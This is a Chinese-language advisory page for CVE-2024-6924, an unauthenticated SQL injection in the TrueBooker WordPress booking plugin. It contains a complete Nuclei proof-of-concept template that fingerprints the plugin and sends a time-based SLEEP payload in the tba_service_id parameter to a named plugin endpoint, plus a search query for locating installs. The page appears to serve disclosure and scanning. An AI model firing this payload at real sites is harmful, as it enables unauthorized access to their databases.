CVE-2024-6924: TrueBooker <= 1.0.2 - SQL Injection

日期: 2025-08-01 | 影响软件: TrueBooker | POC: 已公开

漏洞描述

The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PoC代码[已公开]

id: CVE-2024-6924

info:
  name: TrueBooker <= 1.0.2 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking/truebooker-102-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/39e79801-6ec7-4579-bc6b-fd7e899733a8/
  classification:
    epss-score: 0.75526
    epss-percentile: 0.98857
  metadata:
    vendor: themetechmount
    product: truebooker
    framework: wordpress
    publicwww-query: "/wp-content/plugins/truebooker-appointment-booking"
  tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/truebooker-appointment-booking")'
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tba_service_id=(SLEEP(6))

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100e97d7d6d96ac67aac347ef506d7b3da5d844caba1d019335079b22db276ca2f502210096e6c41fffcfb370258a28bc2367540cd4286d47a6c9dedb3616c2d3ed215e57:922c64590222798bb761d5b6d8e72950

相关漏洞推荐